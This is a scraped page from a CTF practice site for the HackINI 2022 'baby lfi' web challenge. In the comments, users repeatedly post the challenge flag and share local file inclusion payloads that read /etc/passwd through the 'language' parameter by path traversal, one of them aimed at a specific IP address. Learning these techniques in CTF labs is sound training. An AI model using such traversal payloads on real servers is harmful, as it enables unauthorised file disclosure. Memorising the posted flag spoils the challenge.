baby lfiWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: Aman
一血奖励: 0金币
解  决: 2906
提  示:
描  述:
What about making things a bit harder ?
...
登录回复
评论
daisy2413 1年前
举报

shellmates{10CA1_F11e_1Nc1US10n_m4y_r3ve4l_in7Er3st1nG_iNf0Rm4t1on}

回复 0
小白帽来挖个漏洞 1年前
举报

题解:https://blog.csdn.net/guanrongl/article/details/142906680

回复 3
2MASS 1年前
举报

shellmates{10CA1_F11e_1Nc1US10n_m4y_r3ve4l_in7Er3st1nG_iNf0Rm4t1on}

回复 0
MOCHAOLIN 1年前
举报

http://82.157.146.43:18383/?language=/etc/%70%61%73%73%77%64

回复 1
userxin 1年前
举报

?language=/../../../../../../etc/passwd

回复 0
Real丶WuMing 1年前
举报

shellmates{10CA1_F11e_1Nc1US10n_m4y_r3ve4l_in7Er3st1nG_iNf0Rm4t1on}

回复 0
1005667204 1年前
举报

use the language parameter 使用language当参数 ?language=/etc/passwd

回复 0
YOLO77w 1年前
举报

Lfi是本地文件包含 在基本的LFI攻击中,我们可以使用(../)或简单地(/)从目录中直接读取文件的内容,../../../../敲的足够多就能跳转到根目录下../../../../etc/passwd 用到文件包含php伪协议 环境下有Please Select a language of your choice : en/fr ,参数名可能是language 可以在ip+?langu

回复 3
cat1 1年前
举报

shellmates{10CA1_F11e_1Nc1US10n_m4y_r3ve4l_in7Er3st1nG_iNf0Rm4t1on}

回复 1
zzzzq 1年前
举报

shellmates{10CA1_F11e_1Nc1US10n_m4y_r3ve4l_in7Er3st1nG_iNf0Rm4t1on}

回复 1

WriteUp

image
2901600657

3 金币

立即查看

评分(3)

解题动态

gongyy 攻破了该题 2小时前
anya 攻破了该题 2小时前
sann111 攻破了该题 3小时前
painter 攻破了该题 21小时前
66666ctfxr 攻破了该题 1天前
higksc 攻破了该题 1天前
202508940137 攻破了该题 1天前
15206540508 攻破了该题 1天前
asfwefcwded 攻破了该题 2天前
Jjun 攻破了该题 2天前
wwwwjjj 攻破了该题 2天前
lqianqian 攻破了该题 2天前
16690595968 攻破了该题 2天前
miraiz\ 攻破了该题 2天前
DKQ666666 攻破了该题 2天前
win赢 攻破了该题 3天前
proll 攻破了该题 3天前
3287973822 攻破了该题 3天前
难忘的回忆 攻破了该题 4天前
Jinctf 攻破了该题 4天前
问题反馈